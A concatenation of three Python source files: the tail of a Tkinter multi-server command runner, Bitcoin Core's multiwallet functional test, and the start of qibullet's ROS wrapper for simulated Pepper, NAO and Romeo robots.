os.rename(gl.history_file,'%s_%s' % (gl.history_file,strftime("%Y-%m-%d_%H_%M")))
open(gl.history_file,'w').write('''(lp1
S'df -h'
p2
aS'ifconfig'
a.
''')
history_file.close()
entry = AutocompleteCombobox(command_frame)
entry.set_completion_list(gl.history_cmd)
entry.pack(fill=X)
# 确认按键
command_but = Button(command_frame, text='OK', state=DISABLED, command=gexe_cmd)
command_but.pack(side=RIGHT)
# 打开文件按键
file_but = Button(command_frame, text='select server list', command=open_list)
file_but.pack(side=LEFT)
# 执行返回结果框及进度条
text_frame = Frame(root, bd=2, relief=SUNKEN)
text_frame.pack(side=RIGHT, fill=BOTH,expand=YES)
text = Text(text_frame, insertbackground='green', fg='green')
scroll = Scrollbar(text_frame, command=text.yview)
text.configure(yscrollcommand=scroll.set)
scroll.pack(side=RIGHT, fill=Y)
text.pack(fill=BOTH,expand=YES)
# 服务器列表
server_frame = Frame(root, bd=2, relief=SUNKEN)
server_frame.pack(side=LEFT, fill=Y)
def select_all():
for i in gl.cbuts.keys():
gl.cbuts[i].select()
def deselect_all():
for i in gl.cbuts.keys():
gl.cbuts[i].deselect()
def select_con():
for i in gl.cbuts.keys():
if gl.server_all[i].connect_status:
gl.cbuts[i].select()
else:
gl.cbuts[i].deselect()
def deselect_reverse():
for i in gl.cbuts.keys():
if gl.server_all[i].selected.get() == 1:
gl.cbuts[i].deselect()
else:
gl.cbuts[i].select()
server_all_frame = Frame(server_frame, bd=2, relief=SUNKEN)
server_all_frame.pack(side=TOP)
Button(server_all_frame, text='all', command=select_all).grid(row=0, column=0,sticky='nesw')
Button(server_all_frame, text='none', command=deselect_all).grid(row=0, column=1,sticky='nesw')
Button(server_all_frame, text='just_connected', command=select_con).grid(row=1, column=0,sticky='nesw')
Button(server_all_frame, text='reverse', command=deselect_reverse).grid(row=1, column=1,sticky='nesw')
ft = Font(family='Fixdsys', size=11, weight=NORMAL, underline=1)
def listfunction(event):
canvas.configure(scrollregion=canvas.bbox("all"))
server_list_frame = Frame(server_frame, bd=2, relief=SUNKEN)
server_list_frame.pack(fill=Y,expand=YES)
canvas = Canvas(server_list_frame, width=150, height=500)
listframe = Frame(canvas)
myscrollbar = Scrollbar(server_list_frame, orient="vertical", command=canvas.yview)
canvas.configure(yscrollcommand=myscrollbar.set)
myscrollbar.pack(side="right", fill="y")
canvas.pack(side="left", fill=Y)
canvas.create_window((0, 0), window=listframe)
listframe.bind("<Configure>", listfunction)
# 连接断开按键
connect = Button(command_frame, text='connect', state=DISABLED, command=connect)
connect.pack(side=LEFT)
disconnect = Button(command_frame, text='disconnect', state=DISABLED, command=disconnect)
disconnect.pack(side=LEFT)
#线程数量限制
thread_num_label = Label(command_frame,text=' Max Threads: ')
thread_num_label.pack(side=LEFT)
thread_num_e = StringVar()
thread_num_entry = Entry(command_frame,textvariable=thread_num_e,width=5,insertbackground = 'green')
thread_num_e.set('10')
thread_num_entry.pack(side=LEFT)
# 鼠标右键
def save():
save_file = asksaveasfilename(initialdir='.')
if save_file:
open(save_file, 'w').write(text.get(0.0, END))
def clear():
text.delete('0.0', END)
menubar = Menu(root)
menubar.add_command(label='save', command=save)
menubar.add_command(label='clear', command=clear)
def popup(event): # 显示菜单
menubar.post(event.x_root, event.y_root)
text.bind('<Button-3>', popup)
cmd_log = open(gl.logfile, 'a')
def save_log(log=''):
cmd_log.write(log)
def the_end():
# cmd_log.close()
print 'the end'
signal(SIGTERM, the_end)
signal(SIGINT, the_end)
root.mainloop()
if __name__=='__main__':
main()
|
wallet_multiwallet.py | #!/usr/bin/env python3
# Copyright (c) 2017-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test multiwallet.
Verify that a bitcoind node can load multiple wallet files
"""
from decimal import Decimal
from threading import Thread
import os
import shutil
import stat
import time
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import BitcoinTestFramework
from test_framework.test_node import ErrorMatch
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
get_rpc_proxy,
)
got_loading_error = False
def test_load_unload(node, name):
global got_loading_error
for _ in range(10):
if got_loading_error:
return
try:
node.loadwallet(name)
node.unloadwallet(name)
except JSONRPCException as e:
if e.error['code'] == -4 and 'Wallet already being loading' in e.error['message']:
got_loading_error = True
return
class MultiWalletTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 2
self.rpc_timeout = 120
self.extra_args = [["-nowallet"], []]
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def add_options(self, parser):
parser.add_argument(
'--data_wallets_dir',
default=os.path.join(os.path.dirname(os.path.realpath(__file__)), 'data/wallets/'),
help='Test data with wallet directories (default: %(default)s)',
)
def run_test(self):
node = self.nodes[0]
data_dir = lambda *p: os.path.join(node.datadir, self.chain, *p)
wallet_dir = lambda *p: data_dir('wallets', *p)
wallet = lambda name: node.get_wallet_rpc(name)
def wallet_file(name):
if name == self.default_wallet_name:
return wallet_dir(self.default_wallet_name, self.wallet_data_filename)
if os.path.isdir(wallet_dir(name)):
return wallet_dir(name, "wallet.dat")
return wallet_dir(name)
assert_equal(self.nodes[0].listwalletdir(), { 'wallets': [{ 'name': self.default_wallet_name }] })
# check wallet.dat is created
self.stop_nodes()
assert_equal(os.path.isfile(wallet_dir(self.default_wallet_name, self.wallet_data_filename)), True)
# create symlink to verify wallet directory path can be referenced
# through symlink
os.mkdir(wallet_dir('w7'))
os.symlink('w7', wallet_dir('w7_symlink'))
os.symlink('..', wallet_dir('recursive_dir_symlink'))
os.mkdir(wallet_dir('self_walletdat_symlink'))
os.symlink('wallet.dat', wallet_dir('self_walletdat_symlink/wallet.dat'))
# rename wallet.dat to make sure plain wallet file paths (as opposed to
# directory paths) can be loaded
# create another dummy wallet for use in testing backups later
self.start_node(0)
node.createwallet("empty")
node.createwallet("plain")
node.createwallet("created")
self.stop_nodes()
empty_wallet = os.path.join(self.options.tmpdir, 'empty.dat')
os.rename(wallet_file("empty"), empty_wallet)
shutil.rmtree(wallet_dir("empty"))
empty_created_wallet = os.path.join(self.options.tmpdir, 'empty.created.dat')
os.rename(wallet_dir("created", self.wallet_data_filename), empty_created_wallet)
shutil.rmtree(wallet_dir("created"))
os.rename(wallet_file("plain"), wallet_dir("w8"))
shutil.rmtree(wallet_dir("plain"))
# restart node with a mix of wallet names:
# w1, w2, w3 - to verify new wallets created when non-existing paths specified
# w - to verify wallet name matching works when one wallet path is prefix of another
# sub/w5 - to verify relative wallet path is created correctly
# extern/w6 - to verify absolute wallet path is created correctly
# w7_symlink - to verify symlinked wallet path is initialized correctly
# w8 - to verify existing wallet file is loaded correctly. Not tested for SQLite wallets as this is a deprecated BDB behavior.
# '' - to verify default wallet file is created correctly
to_create = ['w1', 'w2', 'w3', 'w', 'sub/w5', 'w7_symlink']
in_wallet_dir = [w.replace('/', os.path.sep) for w in to_create] # Wallets in the wallet dir
in_wallet_dir.append('w7') # w7 is not loaded or created, but will be listed by listwalletdir because w7_symlink
to_create.append(os.path.join(self.options.tmpdir, 'extern/w6')) # External, not in the wallet dir, so we need to avoid adding it to in_wallet_dir
to_load = [self.default_wallet_name]
if not self.options.descriptors:
to_load.append('w8')
wallet_names = to_create + to_load # Wallet names loaded in the wallet
in_wallet_dir += to_load # The loaded wallets are also in the wallet dir
self.start_node(0)
for wallet_name in to_create:
self.nodes[0].createwallet(wallet_name)
for wallet_name in to_load:
self.nodes[0].loadwallet(wallet_name)
os.mkdir(wallet_dir('no_access'))
os.chmod(wallet_dir('no_access'), 0)
try:
with self.nodes[0].assert_debug_log(expected_msgs=['Too many levels of symbolic links', 'Error scanning']):
walletlist = self.nodes[0].listwalletdir()['wallets']
finally:
# Need to ensure access is restored for cleanup
os.chmod(wallet_dir('no_access'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
assert_equal(sorted(map(lambda w: w['name'], walletlist)), sorted(in_wallet_dir))
assert_equal(set(node.listwallets()), set(wallet_names))
# should raise rpc error if wallet path can't be created
err_code = -4 if self.options.descriptors else -1
assert_raises_rpc_error(err_code, "boost::filesystem::create_directory:", self.nodes[0].createwallet, "w8/bad")
# check that all requested wallets were created
self.stop_node(0)
for wallet_name in wallet_names:
assert_equal(os.path.isfile(wallet_file(wallet_name)), True)
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" does not exist')
self.nodes[0].assert_start_raises_init_error(['-walletdir=wallets'], 'Error: Specified -walletdir "wallets" is a relative path', cwd=data_dir())
self.nodes[0].assert_start_raises_init_error(['-walletdir=debug.log'], 'Error: Specified -walletdir "debug.log" is not a directory', cwd=data_dir())
self.start_node(0, ['-wallet=w1', '-wallet=w1'])
self.stop_node(0, 'Warning: Ignoring duplicate -wallet w1.')
if not self.options.descriptors:
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# should not initialize if one wallet is a copy of another
shutil.copyfile(wallet_dir('w8'), wallet_dir('w8_copy'))
in_wallet_dir.append('w8_copy')
exp_stderr = r"BerkeleyDatabase: Can't open database w8_copy \(duplicates fileid \w+ from w8\)"
self.nodes[0].assert_start_raises_init_error(['-wallet=w8', '-wallet=w8_copy'], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
# should not initialize if wallet file is a symlink
os.symlink('w8', wallet_dir('w8_symlink'))
self.nodes[0].assert_start_raises_init_error(['-wallet=w8_symlink'], r'Error: Invalid -wallet path \'w8_symlink\'\. .*', match=ErrorMatch.FULL_REGEX)
# should not initialize if the specified walletdir does not exist
self.nodes[0].assert_start_raises_init_error(['-walletdir=bad'], 'Error: Specified -walletdir "bad" does not exist')
# should not initialize if the specified walletdir is not a directory
not_a_dir = wallet_dir('notadir')
open(not_a_dir, 'a', encoding="utf8").close()
self.nodes[0].assert_start_raises_init_error(['-walletdir=' + not_a_dir], 'Error: Specified -walletdir "' + not_a_dir + '" is not a directory')
self.log.info("Do not allow -upgradewallet with multiwallet")
self.nodes[0].assert_start_raises_init_error(['-upgradewallet'], "Error: Error parsing command line arguments: Invalid parameter -upgradewallet")
self.log.info("Do not allow -zapwallettxes with multiwallet")
self.assert_start_raises_init_error(0, ['-zapwallettxes', '-wallet=w1', '-wallet=w2'], "Error: -zapwallettxes is only allowed with a single wallet file")
self.assert_start_raises_init_error(0, ['-zapwallettxes=1', '-wallet=w1', '-wallet=w2'], "Error: -zapwallettxes is only allowed with a single wallet file")
self.assert_start_raises_init_error(0, ['-zapwallettxes=2', '-wallet=w1', '-wallet=w2'], "Error: -zapwallettxes is only allowed with a single wallet file")
self.log.info("Do not allow -salvagewallet with multiwallet")
self.assert_start_raises_init_error(0, ['-salvagewallet', '-wallet=w1', '-wallet=w2'], "Error: -salvagewallet is only allowed with a single wallet file")
self.assert_start_raises_init_error(0, ['-salvagewallet=1', '-wallet=w1', '-wallet=w2'], "Error: -salvagewallet is only allowed with a single wallet file")
self.log.info("Do not allow -upgradewallet with multiwallet")
self.assert_start_raises_init_error(0, ['-upgradewallet', '-wallet=w1', '-wallet=w2'], "Error: -upgradewallet is only allowed with a single wallet file")
self.assert_start_raises_init_error(0, ['-upgradewallet=1', '-wallet=w1', '-wallet=w2'], "Error: -upgradewallet is only allowed with a single wallet file")
# if wallets/ doesn't exist, datadir should be the default wallet dir
wallet_dir2 = data_dir('walletdir')
os.rename(wallet_dir(), wallet_dir2)
self.start_node(0)
self.nodes[0].createwallet("w4")
self.nodes[0].createwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
node.generatetoaddress(nblocks=1, address=w5.getnewaddress())
# now if wallets/ exists again, but the rootdir is specified as the walletdir, w4 and w5 should still be loaded
os.rename(wallet_dir2, wallet_dir())
self.restart_node(0, ['-nowallet', '-walletdir=' + data_dir()])
self.nodes[0].loadwallet("w4")
self.nodes[0].loadwallet("w5")
assert_equal(set(node.listwallets()), {"w4", "w5"})
w5 = wallet("w5")
w5_info = w5.getwalletinfo()
assert_equal(w5_info['immature_balance'], 50)
competing_wallet_dir = os.path.join(self.options.tmpdir, 'competing_walletdir')
os.mkdir(competing_wallet_dir)
self.restart_node(0, ['-nowallet', '-walletdir=' + competing_wallet_dir])
self.nodes[0].createwallet(self.default_wallet_name)
if self.options.descriptors:
exp_stderr = r"Error: SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another bitcoind?"
else:
exp_stderr = r"Error: Error initializing wallet database environment \"\S+competing_walletdir\S*\"!"
self.nodes[1].assert_start_raises_init_error(['-walletdir=' + competing_wallet_dir], exp_stderr, match=ErrorMatch.PARTIAL_REGEX)
self.restart_node(0)
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
wallets = [wallet(w) for w in wallet_names]
wallet_bad = wallet("bad")
# check wallet names and balances
node.generatetoaddress(nblocks=1, address=wallets[0].getnewaddress())
for wallet_name, wallet in zip(wallet_names, wallets):
info = wallet.getwalletinfo()
assert_equal(info['immature_balance'], 50 if wallet is wallets[0] else 0)
assert_equal(info['walletname'], wallet_name)
# accessing invalid wallet fails
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", wallet_bad.getwalletinfo)
# accessing wallet RPC without using wallet endpoint fails
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w1, w2, w3, w4, *_ = wallets
node.generatetoaddress(nblocks=101, address=w1.getnewaddress())
assert_equal(w1.getbalance(), 100)
assert_equal(w2.getbalance(), 0)
assert_equal(w3.getbalance(), 0)
assert_equal(w4.getbalance(), 0)
w1.sendtoaddress(w2.getnewaddress(), 1)
w1.sendtoaddress(w3.getnewaddress(), 2)
w1.sendtoaddress(w4.getnewaddress(), 3)
node.generatetoaddress(nblocks=1, address=w1.getnewaddress())
assert_equal(w2.getbalance(), 1)
assert_equal(w3.getbalance(), 2)
assert_equal(w4.getbalance(), 3)
batch = w1.batch([w1.getblockchaininfo.get_request(), w1.getwalletinfo.get_request()])
assert_equal(batch[0]["result"]["chain"], self.chain)
assert_equal(batch[1]["result"]["walletname"], "w1")
self.log.info('Check for per-wallet settxfee call')
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], 0)
w2.settxfee(0.001)
assert_equal(w1.getwalletinfo()['paytxfee'], 0)
assert_equal(w2.getwalletinfo()['paytxfee'], Decimal('0.00100000'))
self.log.info("Test dynamic wallet loading")
self.restart_node(0, ['-nowallet'])
assert_equal(node.listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", node.getwalletinfo)
self.log.info("Load first wallet")
loadwallet_name = node.loadwallet(wallet_names[0])
assert_equal(loadwallet_name['name'], wallet_names[0])
assert_equal(node.listwallets(), wallet_names[0:1])
node.getwalletinfo()
w1 = node.get_wallet_rpc(wallet_names[0])
w1.getwalletinfo()
self.log.info("Load second wallet")
loadwallet_name = node.loadwallet(wallet_names[1])
assert_equal(loadwallet_name['name'], wallet_names[1])
assert_equal(node.listwallets(), wallet_names[0:2])
assert_raises_rpc_error(-19, "Wallet file not specified", node.getwalletinfo)
w2 = node.get_wallet_rpc(wallet_names[1])
w2.getwalletinfo()
self.log.info("Concurrent wallet loading")
threads = []
for _ in range(3):
n = node.cli if self.options.usecli else get_rpc_proxy(node.url, 1, timeout=600, coveragedir=node.coverage_dir)
t = Thread(target=test_load_unload, args=(n, wallet_names[2], ))
t.start()
threads.append(t)
for t in threads:
t.join()
global got_loading_error
assert_equal(got_loading_error, True)
self.log.info("Load remaining wallets")
for wallet_name in wallet_names[2:]:
loadwallet_name = self.nodes[0].loadwallet(wallet_name)
assert_equal(loadwallet_name['name'], wallet_name)
assert_equal(set(self.nodes[0].listwallets()), set(wallet_names))
# Fail to load if wallet doesn't exist
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallets")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Path does not exist.".format(path), self.nodes[0].loadwallet, 'wallets')
# Fail to load duplicate wallets
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w1", "wallet.dat")
if self.options.descriptors:
assert_raises_rpc_error(-4, "Wallet file verification failed. SQLiteDatabase: Unable to obtain an exclusive lock on the database, is it being used by another bitcoind?", self.nodes[0].loadwallet, wallet_names[0])
else:
assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, wallet_names[0])
# This tests the default wallet that BDB makes, so SQLite wallet doesn't need to test this
# Fail to load duplicate wallets by different ways (directory and filepath)
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "wallet.dat")
assert_raises_rpc_error(-4, "Wallet file verification failed. Refusing to load database. Data file '{}' is already loaded.".format(path), self.nodes[0].loadwallet, 'wallet.dat')
# Only BDB doesn't open duplicate wallet files. SQLite does not have this limitation. While this may be desired in the future, it is not necessary
# Fail to load if one wallet is a copy of another
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if one wallet is a copy of another, test this twice to make sure that we don't re-introduce #14304
assert_raises_rpc_error(-4, "BerkeleyDatabase: Can't open database w8_copy (duplicates fileid", self.nodes[0].loadwallet, 'w8_copy')
# Fail to load if wallet file is a symlink
assert_raises_rpc_error(-4, "Wallet file verification failed. Invalid -wallet path 'w8_symlink'", self.nodes[0].loadwallet, 'w8_symlink')
# Fail to load if a directory is specified that doesn't contain a wallet
os.mkdir(wallet_dir('empty_wallet_dir'))
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "empty_wallet_dir")
assert_raises_rpc_error(-18, "Wallet file verification failed. Failed to load database path '{}'. Data is not in recognized format.".format(path), self.nodes[0].loadwallet, 'empty_wallet_dir')
self.log.info("Test dynamic wallet creation.")
# Fail to create a wallet if it already exists.
path = os.path.join(self.options.tmpdir, "node0", "regtest", "wallets", "w2")
assert_raises_rpc_error(-4, "Failed to create database path '{}'. Database already exists.".format(path), self.nodes[0].createwallet, 'w2')
# Successfully create a wallet with a new name
loadwallet_name = self.nodes[0].createwallet('w9')
in_wallet_dir.append('w9')
assert_equal(loadwallet_name['name'], 'w9')
w9 = node.get_wallet_rpc('w9')
assert_equal(w9.getwalletinfo()['walletname'], 'w9')
assert 'w9' in self.nodes[0].listwallets()
# Successfully create a wallet using a full path
new_wallet_dir = os.path.join(self.options.tmpdir, 'new_walletdir')
new_wallet_name = os.path.join(new_wallet_dir, 'w10')
loadwallet_name = self.nodes[0].createwallet(new_wallet_name)
assert_equal(loadwallet_name['name'], new_wallet_name)
w10 = node.get_wallet_rpc(new_wallet_name)
assert_equal(w10.getwalletinfo()['walletname'], new_wallet_name)
assert new_wallet_name in self.nodes[0].listwallets()
self.log.info("Test dynamic wallet unloading")
# Test `unloadwallet` errors
assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].unloadwallet)
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", self.nodes[0].unloadwallet, "dummy")
assert_raises_rpc_error(-18, "Requested wallet does not exist or is not loaded", node.get_wallet_rpc("dummy").unloadwallet)
assert_raises_rpc_error(-8, "Both the RPC endpoint wallet and wallet_name parameter were provided (only one allowed)", w1.unloadwallet, "w2"),
assert_raises_rpc_error(-8, "Both the RPC endpoint wallet and wallet_name parameter were provided (only one allowed)", w1.unloadwallet, "w1"),
# Successfully unload the specified wallet name
self.nodes[0].unloadwallet("w1")
assert 'w1' not in self.nodes[0].listwallets()
# Successfully unload the wallet referenced by the request endpoint
# Also ensure unload works during walletpassphrase timeout
w2.encryptwallet('test')
w2.walletpassphrase('test', 1)
w2.unloadwallet()
time.sleep(1.1)
assert 'w2' not in self.nodes[0].listwallets()
# Successfully unload all wallets
for wallet_name in self.nodes[0].listwallets():
self.nodes[0].unloadwallet(wallet_name)
assert_equal(self.nodes[0].listwallets(), [])
assert_raises_rpc_error(-18, "No wallet is loaded. Load a wallet using loadwallet or create a new one with createwallet. (Note: A default wallet is no longer automatically created)", self.nodes[0].getwalletinfo)
# Successfully load a previously unloaded wallet
self.nodes[0].loadwallet('w1')
assert_equal(self.nodes[0].listwallets(), ['w1'])
assert_equal(w1.getwalletinfo()['walletname'], 'w1')
assert_equal(sorted(map(lambda w: w['name'], self.nodes[0].listwalletdir()['wallets'])), sorted(in_wallet_dir))
# Test backing up and restoring wallets
self.log.info("Test wallet backup")
self.restart_node(0, ['-nowallet'])
for wallet_name in wallet_names:
self.nodes[0].loadwallet(wallet_name)
for wallet_name in wallet_names:
rpc = self.nodes[0].get_wallet_rpc(wallet_name)
addr = rpc.getnewaddress()
backup = os.path.join(self.options.tmpdir, 'backup.dat')
if os.path.exists(backup):
os.unlink(backup)
rpc.backupwallet(backup)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(empty_created_wallet if wallet_name == self.default_wallet_name else empty_wallet, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], False)
self.nodes[0].unloadwallet(wallet_name)
shutil.copyfile(backup, wallet_file(wallet_name))
self.nodes[0].loadwallet(wallet_name)
assert_equal(rpc.getaddressinfo(addr)['ismine'], True)
# Test .walletlock file is closed
self.start_node(1)
wallet = os.path.join(self.options.tmpdir, 'my_wallet')
self.nodes[0].createwallet(wallet)
if self.options.descriptors:
assert_raises_rpc_error(-4, "Unable to obtain an exclusive lock", self.nodes[1].loadwallet, wallet)
else:
assert_raises_rpc_error(-4, "Error initializing wallet database environment", self.nodes[1].loadwallet, wallet)
self.nodes[0].unloadwallet(wallet)
self.nodes[1].loadwallet(wallet)
if __name__ == '__main__':
MultiWalletTest().main()
|
ros_wrapper.py | #!/usr/bin/env python
# coding: utf-8
import os
import sys
import atexit
import pybullet
from qibullet.camera import Camera
from qibullet.camera import CameraRgb
from qibullet.camera import CameraDepth
from qibullet.nao_virtual import NaoVirtual
from qibullet.romeo_virtual import RomeoVirtual
from qibullet.pepper_virtual import PepperVirtual
from qibullet.base_controller import PepperBaseController
from threading import Thread
try:
import rospy
import roslib
import roslaunch
import tf2_ros
from cv_bridge import CvBridge
from sensor_msgs.msg import Image
from sensor_msgs.msg import CameraInfo
from sensor_msgs.msg import JointState
from sensor_msgs.msg import LaserScan
from std_msgs.msg import Header
from std_msgs.msg import Empty
from naoqi_bridge_msgs.msg import JointAnglesWithSpeed
from geometry_msgs.msg import TransformStamped
from geometry_msgs.msg import Twist
from nav_msgs.msg import Odometry
try:
from naoqi_bridge_msgs.msg import PoseStampedWithSpeed as MovetoPose
OFFICIAL_DRIVER = False
print("Using softbankrobotics-research forked version of NAOqi driver")
except ImportError as e:
from geometry_msgs.msg import PoseStamped as MovetoPose
OFFICIAL_DRIVER = True
MISSING_IMPORT = None
except ImportError as e:
MISSING_IMPORT = str(e)
class RosWrapper:
"""
Virtual class defining the basis of a robot ROS wrapper
"""
def __init__(self):
"""
Constructor
"""
if MISSING_IMPORT is not None:
raise pybullet.error(MISSING_IMPORT)
self.spin_thread = None
self._wrapper_termination = False
self.image_bridge = CvBridge()
self.roslauncher = None
self.transform_broadcaster = tf2_ros.TransformBroadcaster()
atexit.register(self.stopWrapper)
def stopWrapper(self):
"""
Stops the ROS wrapper
"""
self._wrapper_termination = True
try:
assert self.spin_thread is not None
assert isinstance(self.spin_thread, Thread)
assert self.spin_thread.isAlive()
self.spin_thread.join()
except AssertionError:
pass
if self.roslauncher is not None:
self.roslauncher.stop()
print("Stopping roslauncher")
def launchWrapper(self, virtual_robot, ros_namespace, frequency=200):
"""
Launches the ROS wrapper
Parameters:
virtual_robot - The instance of the simulated model
ros_namespace - The ROS namespace to be added before the ROS topics
advertized and subscribed
frequency - The frequency of the ROS rate that will be used to pace
the wrapper's main loop
"""
if MISSING_IMPORT is not None:
raise pybullet.error(MISSING_IMPORT)
self.robot = virtual_robot
self.ros_namespace = ros_namespace
self.frequency = frequency
rospy.init_node(
"qibullet_wrapper",
anonymous=True,
disable_signals=False)
# Upload the robot description to the ros parameter server
try:
if isinstance(self.robot, PepperVirtual):
robot_name = "pepper"
elif isinstance(self.robot, NaoVirtual):
robot_name = "nao"
elif isinstance(self.robot, RomeoVirtual):
robot_name = "romeo"
else:
raise pybullet.error(
"Unknown robot type, wont set robot description")
package_path = roslib.packages.get_pkg_dir("naoqi_driver")
urdf_path = package_path + "/share/urdf/" + robot_name + ".urdf"
with open(urdf_path, 'r') as file:
robot_description = file.read()
rospy.set_param("/robot_description", robot_description)
except IOError as e:
raise pybullet.error(
"Could not retrieve robot descrition: " + str(e))
# Launch the robot state publisher
robot_state_publisher = roslaunch.core.Node(
"robot_state_publisher",
"robot_state_publisher")
self.roslauncher = roslaunch.scriptapi.ROSLaunch()
self.roslauncher.start()
self.roslauncher.launch(robot_state_publisher)
# Initialize the ROS publisher and subscribers
self._initPublishers()
self._initSubscribers()
# Launch the wrapper's main loop
self._wrapper_termination = False
self.spin_thread = Thread(target=self._spin)
self.spin_thread.start()
def _initPublishers(self):
"""
ABSTRACT INTERNAL METHOD, needs to be implemented in each daughter
class. Initializes the ROS publishers
"""
raise NotImplementedError
def _initSubscribers(self):
"""
ABSTRACT INTERNAL METHOD, needs to be implemented in each daughter
class. Initializes the ROS subscribers
"""
raise NotImplementedError
def _spin(self):
"""
ABSTRACT INTERNAL METHOD, needs to be implemented in each daughter
class. Designed to emulate a ROS spin method
"""
raise NotImplementedError
def _broadcastOdometry(self, odometry_publisher):
"""
INTERNAL METHOD, computes an odometry message based on the robot's
position, and broadcast it
Parameters:
odometry_publisher - The ROS publisher for the odometry message
"""
# Send Transform odom
x, y, theta = self.robot.getPosition()
odom_trans = TransformStamped()
odom_trans.header.frame_id = "odom"
odom_trans.child_frame_id = "base_link"
odom_trans.header.stamp = rospy.get_rostime()
odom_trans.transform.translation.x = x
odom_trans.transform.translation.y = y
odom_trans.transform.translation.z = 0
quaternion = pybullet.getQuaternionFromEuler([0, 0, theta])
odom_trans.transform.rotation.x = quaternion[0]
odom_trans.transform.rotation.y = quaternion[1]
odom_trans.transform.rotation.z = quaternion[2]
odom_trans.transform.rotation.w = quaternion[3]
self.transform_broadcaster.sendTransform(odom_trans)
# Set up the odometry
odom = Odometry()
odom.header.stamp = rospy.get_rostime()
odom.header.frame_id = "odom"
odom.pose.pose.position.x = x
odom.pose.pose.position.y = y
odom.pose.pose.position.z = 0.0
odom.pose.pose.orientation = odom_trans.transform.rotation
odom.child_frame_id = "base_link"
[vx, vy, vz], [wx, wy, wz] = pybullet.getBaseVelocity(
self.robot.getRobotModel(),
self.robot.getPhysicsClientId())
odom.twist.twist.linear.x = vx
odom.twist.twist.linear.y = vy
odom.twist.twist.angular.z = wz
odometry_publisher.publish(odom)
def _broadcastCamera(self, camera, image_publisher, info_publisher):
"""
INTERNAL METHOD, computes the image message and the info message of the
given camera and publishes them into the ROS framework
Parameters:
camera - The camera used for broadcasting
image_publisher - The ROS publisher for the Image message,
corresponding to the image delivered by the active camera
info_publisher - The ROS publisher for the CameraInfo message,
corresponding to the parameters of the active camera
"""
try:
frame = camera.getFrame()
assert frame is not None
# Fill the camera info message
info_msg = CameraInfo()
info_msg.distortion_model = "plumb_bob"
info_msg.header.frame_id = camera.getCameraLink().getName()
info_msg.width = camera.getResolution().width
info_msg.height = camera.getResolution().height
info_msg.D = [0.0, 0.0, 0.0, 0.0, 0.0]
info_msg.K = camera._getCameraIntrinsics()
info_msg.R = [1, 0, 0, 0, 1, 0, 0, 0, 1]
info_msg.P = list(info_msg.K)
info_msg.P.insert(3, 0.0)
info_msg.P.insert(7, 0.0)
info_msg.P.append(0.0)
# Fill the image message
image_msg = self.image_bridge.cv2_to_imgmsg(frame)
image_msg.header.frame_id = camera.getCameraLink().getName()
# Check if the retrieved image is RGB or a depth image
if isinstance(camera, CameraDepth):
image_msg.encoding = "16UC1"
else:
image_msg.encoding = "bgr8"
# Publish the image and the camera info
image_publisher.publish(image_msg)
info_publisher.publish(info_msg)
except AssertionError:
pass
def _broadcastJointState(self, joint_state_publisher, extra_joints=None):
"""
INTERNAL METHOD, publishes the state of the robot's joints into the ROS
framework
Parameters:
joint_state_publisher - The ROS publisher for the JointState
message, describing the state of the robot's joints
extra_joints - A dict, describing extra joints to be published. The
dict should respect the following syntax:
{"joint_name": joint_value, ...}
"""
msg_joint_state = JointState()
msg_joint_state.header = Header()
msg_joint_state.header.stamp = rospy.get_rostime()
msg_joint_state.name = list(self.robot.joint_dict)
msg_joint_state.position = self.robot.getAnglesPosition(
msg_joint_state.name)
try:
assert isinstance(extra_joints, dict)
for name, value in extra_joints.items():
msg_joint_state.name += [name]
msg_joint_state.position += [value]
except AssertionError:
pass
joint_state_publisher.publish(msg_joint_state)
def _jointAnglesCallback(self, msg):
"""
INTERNAL METHOD, callback triggered when a message is received on the
/joint_angles topic
Parameters:
msg - a ROS message containing a pose stamped with a speed
associated to it. The type of the message is the following:
naoqi_bridge_msgs::JointAnglesWithSpeed. That type can be found in
the ros naoqi software stack
"""
joint_list = msg.joint_names
position_list = list(msg.joint_angles)
# If the "non official" driver (softbankrobotics-research fork) is
# used, will try to detect if multiple speeds have been provided. If
# not, or if the "official" driver is used, the speed attribute of the
# message will be used
try:
assert not OFFICIAL_DRIVER
if len(msg.speeds) != 0:
velocity = list(msg.speeds)
else:
velocity = msg.speed
except AssertionError:
velocity = msg.speed
self.robot.setAngles(joint_list, position_list, velocity)
class NaoRosWrapper(RosWrapper):
"""
